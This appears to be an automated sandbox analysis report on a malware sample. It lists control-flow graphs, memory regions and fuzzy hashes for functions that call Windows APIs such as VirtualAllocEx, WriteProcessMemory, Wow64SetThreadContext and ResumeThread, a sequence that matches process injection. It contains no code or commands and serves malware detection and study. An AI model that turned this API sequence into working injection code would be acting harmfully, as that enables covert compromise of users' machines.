                                              control_flow_graph 1326 d4ada8-d4adb7 1327 d4ade3-d4ade7 1326->1327 1328 d4adb9-d4adc6 call d4a0cc 1326->1328 1330 d4ade9-d4adf3 1327->1330 1331 d4adfb-d4ae3c 1327->1331 1335 d4addc 1328->1335 1336 d4adc8 1328->1336 1330->1331 1337 d4ae3e-d4ae46 1331->1337 1338 d4ae49-d4ae57 1331->1338 1335->1327 1383 d4adce call d4b040 1336->1383 1384 d4adce call d4b031 1336->1384 1337->1338 1339 d4ae59-d4ae5e 1338->1339 1340 d4ae7b-d4ae7d 1338->1340 1342 d4ae60-d4ae67 call d4a0d8 1339->1342 1343 d4ae69 1339->1343 1345 d4ae80-d4ae87 1340->1345 1341 d4add4-d4add6 1341->1335 1344 d4af18-d4af94 1341->1344 1347 d4ae6b-d4ae79 1342->1347 1343->1347 1376 d4af96-d4afbe 1344->1376 1377 d4afc0-d4afd8 1344->1377 1348 d4ae94-d4ae9b 1345->1348 1349 d4ae89-d4ae91 1345->1349 1347->1345 1350 d4ae9d-d4aea5 1348->1350 1351 d4aea8-d4aeaa call d4a0e8 1348->1351 1349->1348 1350->1351 1355 d4aeaf-d4aeb1 1351->1355 1357 d4aeb3-d4aebb 1355->1357 1358 d4aebe-d4aec3 1355->1358 1357->1358 1359 d4aec5-d4aecc 1358->1359 1360 d4aee1-d4aeee 1358->1360 1359->1360 1362 d4aece-d4aede call d4a0f8 call d4a108 1359->1362 1366 d4aef0-d4af0e 1360->1366 1367 d4af11-d4af17 1360->1367 1362->1360 1366->1367 1376->1377 1378 d4afe0-d4b00b GetModuleHandleW 1377->1378 1379 d4afda-d4afdd 1377->1379 1380 d4b014-d4b028 1378->1380 1381 d4b00d-d4b013 1378->1381 1379->1378 1381->1380 1383->1341 1384->1341
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D4AFFE
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 1aa1dc9cf88be52ab730820f5e6cfae1fdd068d4d6846cad30d9929d46c68e5b
                                              • Instruction ID: 34433b3408dbd0fe6cd8bbb00f8a029f8e9a547137670e095cac7a4812a50116
                                              • Opcode Fuzzy Hash: 1aa1dc9cf88be52ab730820f5e6cfae1fdd068d4d6846cad30d9929d46c68e5b
                                              • Instruction Fuzzy Hash: A8815970A00B458FDB24DF29D44579AB7F1FF88304F04492EE496DBA50D775E84ACBA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1385 4f818e4-4f81956 1386 4f81958-4f8195e 1385->1386 1387 4f81961-4f81968 1385->1387 1386->1387 1388 4f8196a-4f81970 1387->1388 1389 4f81973-4f81a12 CreateWindowExW 1387->1389 1388->1389 1391 4f81a1b-4f81a53 1389->1391 1392 4f81a14-4f81a1a 1389->1392 1396 4f81a60 1391->1396 1397 4f81a55-4f81a58 1391->1397 1392->1391 1398 4f81a61 1396->1398 1397->1396 1398->1398
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81A02
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1307793012.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4f80000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: b2fd02bf1d5911434140357ab16c86a098ef9bb4e8f8e255f77bd0cc59e737f7
                                              • Instruction ID: c7f45d60d834aaec4101d958b6d3158b96eee5013c1678dda6876a6ac53116c4
                                              • Opcode Fuzzy Hash: b2fd02bf1d5911434140357ab16c86a098ef9bb4e8f8e255f77bd0cc59e737f7
                                              • Instruction Fuzzy Hash: 2551C2B1D00309DFDB14DF99C984ADEBBB5FF48300F24822AE419AB210D775A986CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1399 4f818f0-4f81956 1400 4f81958-4f8195e 1399->1400 1401 4f81961-4f81968 1399->1401 1400->1401 1402 4f8196a-4f81970 1401->1402 1403 4f81973-4f81a12 CreateWindowExW 1401->1403 1402->1403 1405 4f81a1b-4f81a53 1403->1405 1406 4f81a14-4f81a1a 1403->1406 1410 4f81a60 1405->1410 1411 4f81a55-4f81a58 1405->1411 1406->1405 1412 4f81a61 1410->1412 1411->1410 1412->1412
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81A02
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1307793012.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4f80000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: fa58c864f94940c93fb055c345718ccf5070017d368bd17934e165b57a823a01
                                              • Instruction ID: 8c4dd1e747a8843a97c32d2e79addd705ebf957c9fff33532e6e50447006a706
                                              • Opcode Fuzzy Hash: fa58c864f94940c93fb055c345718ccf5070017d368bd17934e165b57a823a01
                                              • Instruction Fuzzy Hash: F341C2B1D10309DFDB14CF99C984ADEBBB5BF48310F24822EE419AB210D775A946CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1413 d444c4-d459d9 CreateActCtxA 1416 d459e2-d45a3c 1413->1416 1417 d459db-d459e1 1413->1417 1424 d45a3e-d45a41 1416->1424 1425 d45a4b-d45a4f 1416->1425 1417->1416 1424->1425 1426 d45a60 1425->1426 1427 d45a51-d45a5d 1425->1427 1428 d45a61 1426->1428 1427->1426 1428->1428
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00D459C9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 73b4f23d2471914ab76a36e5254edeb74fbe9c1a094a8c3c4122e949cf401d01
                                              • Instruction ID: ea1b8e611992af95ac93be3fe0e914b3b5a502081026f73b3b92dbb716099481
                                              • Opcode Fuzzy Hash: 73b4f23d2471914ab76a36e5254edeb74fbe9c1a094a8c3c4122e949cf401d01
                                              • Instruction Fuzzy Hash: 3141C170C00718CBEB24CFA9D88578DBBF5BF48304F24816AD408AB255DB756945CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1430 d4590c-d459d9 CreateActCtxA 1432 d459e2-d45a3c 1430->1432 1433 d459db-d459e1 1430->1433 1440 d45a3e-d45a41 1432->1440 1441 d45a4b-d45a4f 1432->1441 1433->1432 1440->1441 1442 d45a60 1441->1442 1443 d45a51-d45a5d 1441->1443 1444 d45a61 1442->1444 1443->1442 1444->1444
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00D459C9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: a77a08fe376d5b1500488c01467600190bb8810e371d72a1f969faf2977cb984
                                              • Instruction ID: 6efab34a7166ffc5820b3b78691a91f006ad0069545e6bd6035ce3da0514f538
                                              • Opcode Fuzzy Hash: a77a08fe376d5b1500488c01467600190bb8810e371d72a1f969faf2977cb984
                                              • Instruction Fuzzy Hash: 2E41C1B0C00719CFEB25CFA9D885B8DBBF5BF49304F24816AD408AB255DB756946CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1446 4f84040-4f8407c 1447 4f8412c-4f8414c 1446->1447 1448 4f84082-4f84087 1446->1448 1454 4f8414f-4f8415c 1447->1454 1449 4f84089-4f840c0 1448->1449 1450 4f840da-4f84112 CallWindowProcW 1448->1450 1456 4f840c9-4f840d8 1449->1456 1457 4f840c2-4f840c8 1449->1457 1452 4f8411b-4f8412a 1450->1452 1453 4f84114-4f8411a 1450->1453 1452->1454 1453->1452 1456->1454 1457->1456
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F84101
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1307793012.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_4f80000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 6e2daf9a3b3ed853ee0497f15e153f42d40aa10e63239b7dda9947eeeb27f25c
                                              • Instruction ID: 50654599ccd23b3dac4a8c6cc3b3572baca412169303a61e70b6f556c56c8d8b
                                              • Opcode Fuzzy Hash: 6e2daf9a3b3ed853ee0497f15e153f42d40aa10e63239b7dda9947eeeb27f25c
                                              • Instruction Fuzzy Hash: 884115B9A00319CFDB15DF99C848AAAFBF5FB88314F248459D519AB321D375A841CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1460 8724898-87248ee 1462 87248f0-87248fc 1460->1462 1463 87248fe-872493d WriteProcessMemory 1460->1463 1462->1463 1465 8724946-8724976 1463->1465 1466 872493f-8724945 1463->1466 1466->1465
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08724930
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 8cde77a4d48f1e6ccbdd4f91d780b314342b3dc1cc289196667bcdde9159f4ca
                                              • Instruction ID: 6c27d930ca6ebecd44189fe03f1fca78c50d4aa0ccdd8fe3239f2fcd6d0ea3c5
                                              • Opcode Fuzzy Hash: 8cde77a4d48f1e6ccbdd4f91d780b314342b3dc1cc289196667bcdde9159f4ca
                                              • Instruction Fuzzy Hash: 172113B2D00359DFDB10CFA9C880BEEBBF1FB48310F14842AE958A7650C7799940CB69
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08724930
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: d53e56ae467188c51a72e700f42222f84e1506675e18010eacf58591dbcd97f9
                                              • Instruction ID: af19a7659d7670137716fe7fc0af0a9929aa036292c09cd95a7a5dabeb249623
                                              • Opcode Fuzzy Hash: d53e56ae467188c51a72e700f42222f84e1506675e18010eacf58591dbcd97f9
                                              • Instruction Fuzzy Hash: 162115B2D003599FDB10CFAAC881BDEBBF5FB48310F10842AE958A7240C7799940CBA4
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08724786
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 85f56653e45ecb2c66dbcf23725c61168e2fcd40692095eac0db875fdbfb4274
                                              • Instruction ID: e1883d25d096425a91cbe75505fc5e150efed24065129b50b1941830c8cfa591
                                              • Opcode Fuzzy Hash: 85f56653e45ecb2c66dbcf23725c61168e2fcd40692095eac0db875fdbfb4274
                                              • Instruction Fuzzy Hash: CE2137B5D00308CFDB14DFAAC5857AEBBF4EB88214F14842ED469A7740DB789945CFA8
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D4D717
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 2ec5a3d645d10299e0ca183604e25d2bc9b5430a1d75d83ea93dad755c292bb9
                                              • Instruction ID: d801cac08204dbd6de7465e3499a9afc41e2a87ee6b58956636e2285fef299a6
                                              • Opcode Fuzzy Hash: 2ec5a3d645d10299e0ca183604e25d2bc9b5430a1d75d83ea93dad755c292bb9
                                              • Instruction Fuzzy Hash: 0221E2B5D01248DFDB10CFAAD984ADEBBF5FB48314F14801AE918A7350D379A941CFA5
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08724A10
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: eec5588500ef4931110f7775797f87f3d86add053b1d357ed91aa8271da071bd
                                              • Instruction ID: 8ca82813cc41103c8f4170353b55bd2958a1779d0f5afc39adad3383196d9512
                                              • Opcode Fuzzy Hash: eec5588500ef4931110f7775797f87f3d86add053b1d357ed91aa8271da071bd
                                              • Instruction Fuzzy Hash: 8E2116B1C003599FDB10CFAAC840BDEBBF5FF48310F10842AE558A7640C7799940DBA9
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08724A10
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: f2dc2b9a981a160d6803fcd4c8bfab40c2b273b9c58848ab26325f06569e659c
                                              • Instruction ID: caac335aed74e0606a98287f712d0d35ea2ce920b1dafd7db18d7ac8ef75b019
                                              • Opcode Fuzzy Hash: f2dc2b9a981a160d6803fcd4c8bfab40c2b273b9c58848ab26325f06569e659c
                                              • Instruction Fuzzy Hash: 4B2105B2C01259DFDB10CFAAC941BEEBBF5FF48310F54842AE558A7640C7799940DB68
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08724786
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: f90be6e6ecbe78f4c8e89e13aa871f82bb99f29a0a698ab163ddf9d67e8e96a4
                                              • Instruction ID: 804c1d3d3771550ed0c1cd6734ac0b46920add0883e8869fc484a2c025000fa9
                                              • Opcode Fuzzy Hash: f90be6e6ecbe78f4c8e89e13aa871f82bb99f29a0a698ab163ddf9d67e8e96a4
                                              • Instruction Fuzzy Hash: B0213471D003088FDB14DFAAC485BAEBBF4AB48214F14842ED469A7640CB78A945CFA9
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D4D717
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: fa17f21f88160e8168c91774100fa39da20f9256dc6dcebc9832a794cb031a70
                                              • Instruction ID: 09618c2daf412e9744875504f8eee4d91fd8e0c16e5bac123f11c2f557e99328
                                              • Opcode Fuzzy Hash: fa17f21f88160e8168c91774100fa39da20f9256dc6dcebc9832a794cb031a70
                                              • Instruction Fuzzy Hash: D021E2B5D002489FDB10CFAAD984ADEBBF9FB48310F14801AE918A3350C379A940CFA5
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0872484E
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 9c3174222e92d371f8ff029b7cb1024c635269d5e2041d641a14b877ba0447d6
                                              • Instruction ID: 0a4c208a475499ddca36bac35798f03887f083c5da93d18e69b26602f3104d4c
                                              • Opcode Fuzzy Hash: 9c3174222e92d371f8ff029b7cb1024c635269d5e2041d641a14b877ba0447d6
                                              • Instruction Fuzzy Hash: 7F115672C002489FDF20CFAAD844BDEBBF5EB48324F14841AE929A7650C7759541CFA4
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D4B079,00000800,00000000,00000000), ref: 00D4B28A
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 5f84b8e08c6fbdb3b4e0aae00fd9aa25b2d42b5eb48ddd0daaa24ac79ff2698f
                                              • Instruction ID: e3dd553a0289338faae94f9985bfcee9fa3465ec22c998cf0514052bef76af73
                                              • Opcode Fuzzy Hash: 5f84b8e08c6fbdb3b4e0aae00fd9aa25b2d42b5eb48ddd0daaa24ac79ff2698f
                                              • Instruction Fuzzy Hash: 3E1117B6C003089FDB10CF9AD444BDEFBF4EB48320F14842AD455A7200C3B5A545CFA9
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D4B079,00000800,00000000,00000000), ref: 00D4B28A
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 23cc068b465ad966a829520bac833f64fb41e5bcd7ca5a140e8b237dd04f32eb
                                              • Instruction ID: ded87e51d14f24686686ffcb8b14c1fe91365e43e4a7967e3c8cbdde98b9427e
                                              • Opcode Fuzzy Hash: 23cc068b465ad966a829520bac833f64fb41e5bcd7ca5a140e8b237dd04f32eb
                                              • Instruction Fuzzy Hash: E31114B6C002498FDB10CFAAD444BDEFBF4EB48320F14842AD459A7300C3B5A545CFA9
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0872484E
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 7e296312f4fff9659b94edb3e99fb6b507193eda6cf3a5c6d07cac31a8cdcd20
                                              • Instruction ID: 4f6c8ad4d27c751461932fe70dde32002c2a11f344b9ebe906dd53da1c4caef4
                                              • Opcode Fuzzy Hash: 7e296312f4fff9659b94edb3e99fb6b507193eda6cf3a5c6d07cac31a8cdcd20
                                              • Instruction Fuzzy Hash: 1F112672C003489FDB24DFAAC844BDEBBF5EB48314F14841AE529A7650C7759540CFA9
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 6b6644c467835a46c94491fd06599a75f514b32f991fc19a8ab5a402e2fdff01
                                              • Instruction ID: 68c3e282741ee86cdf304eeb01e8b17c5fb9a5b77a1da00ec78e8962a11af5bf
                                              • Opcode Fuzzy Hash: 6b6644c467835a46c94491fd06599a75f514b32f991fc19a8ab5a402e2fdff01
                                              • Instruction Fuzzy Hash: 0D1146B2D00258CFDB24DFAAC4857DEBBF4EB48314F24841AD419A7640C7796545CBA9
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 6a8a075254db9c893af59108c01c11aad99e1bdffb9dd1eb812ce3c0f64e3033
                                              • Instruction ID: 886ca3d8a5680bbe72210e4be759ad11415dd575629fb722c7af2e79bf03cd35
                                              • Opcode Fuzzy Hash: 6a8a075254db9c893af59108c01c11aad99e1bdffb9dd1eb812ce3c0f64e3033
                                              • Instruction Fuzzy Hash: 7E1128B1D003488FDB24DFAAC44579EFBF4AB48314F24841AD419A7640C7796540CBA9
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D4AFFE
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 1f42b4a31ad695286db173ea0d0c6a785ba6c21620366faaffba332861200ec1
                                              • Instruction ID: 29998395bbb56570dd879e0ddbf721b0afdbbdccc12947d5e08964209a5527c7
                                              • Opcode Fuzzy Hash: 1f42b4a31ad695286db173ea0d0c6a785ba6c21620366faaffba332861200ec1
                                              • Instruction Fuzzy Hash: AF11E0B6C002498FDB24CF9AD444BDEFBF4EF88324F14842AD869A7610D379A545CFA5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0872960D
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: b5c6a975a5907c19b00daa781bf61a74ae0b02a063a7404dff6d8ea3259b98e4
                                              • Instruction ID: 5b78e265b19f97629aea9e022e65869e9000be194350dd80e476456aa973cbf0
                                              • Opcode Fuzzy Hash: b5c6a975a5907c19b00daa781bf61a74ae0b02a063a7404dff6d8ea3259b98e4
                                              • Instruction Fuzzy Hash: 0511F2B5800358DFDB20DF9AD885BDEBBF8FB48310F14841AE958A7240C375A944CFA5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0872960D
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 36d8b9fb696ffd0a9658846968a8ac48be4e509f72eddcae0e62ecc7095ec272
                                              • Instruction ID: e73d9470f070f156a270d337346dd1d8c59105cf997b7c5ded311064e6d41bf8
                                              • Opcode Fuzzy Hash: 36d8b9fb696ffd0a9658846968a8ac48be4e509f72eddcae0e62ecc7095ec272
                                              • Instruction Fuzzy Hash: C311F2B6800259CFDB20CF9AD989BDEBBF4EB48310F14845AE958A7600C375A544CFA5
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304577228.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ced000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd9ae442fbf1c0ef02ab72205e0d78e977a34b2b8218c9bf41a266eea0e3f5e8
                                              • Instruction ID: 1d99e2db005f6bc550caf97fc1745b66e2215b97b2bafe67f825c8f472393688
                                              • Opcode Fuzzy Hash: cd9ae442fbf1c0ef02ab72205e0d78e977a34b2b8218c9bf41a266eea0e3f5e8
                                              • Instruction Fuzzy Hash: 0621F172504380EFDF15DF51D9C0B26BBA5FB88310F2085A9EA0A0B246C336DC56DBA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d286e58716cd901d05ca66c398f0dc30409e6c1228a0c51211a939dbb4365e7f
                                              • Instruction ID: 3aa576488f1bb89e938dbcf3b355be7cd3c355d187b57bb9bdc4be1b2ac837c9
                                              • Opcode Fuzzy Hash: d286e58716cd901d05ca66c398f0dc30409e6c1228a0c51211a939dbb4365e7f
                                              • Instruction Fuzzy Hash: F821F571504308EFDB54DF20D5C4B26BBA6FB84314F20C56DEA0A4B296CB36D847CA63
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a15599acd94fc20a3e3fd38721783bbf8595530bd9bb150826a353575da2b202
                                              • Instruction ID: 758879ed4f9ed1cca4b8c2d92df687a520d281035c0301ecc1ea099f976205fc
                                              • Opcode Fuzzy Hash: a15599acd94fc20a3e3fd38721783bbf8595530bd9bb150826a353575da2b202
                                              • Instruction Fuzzy Hash: BB210771904308EFDB55DF10D5C0B26BBA6FB84314F20C5ADEA0A4B292C336DC46CAA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bcb8d91221640ba896609ef930aa856f639427e3c5953cbadec0f5fc285c5e72
                                              • Instruction ID: cb153eed29fdda88a5bddd55e677030714f9a853b8af0208f6612af91d40edc6
                                              • Opcode Fuzzy Hash: bcb8d91221640ba896609ef930aa856f639427e3c5953cbadec0f5fc285c5e72
                                              • Instruction Fuzzy Hash: 9B219F755093C48FCB12CF20D994715BF72EB46314F28C5EAD9498F6A7C33A980ACB62
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304577228.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ced000_EDyxAgkldisLe.jbxd
                                              Similarity
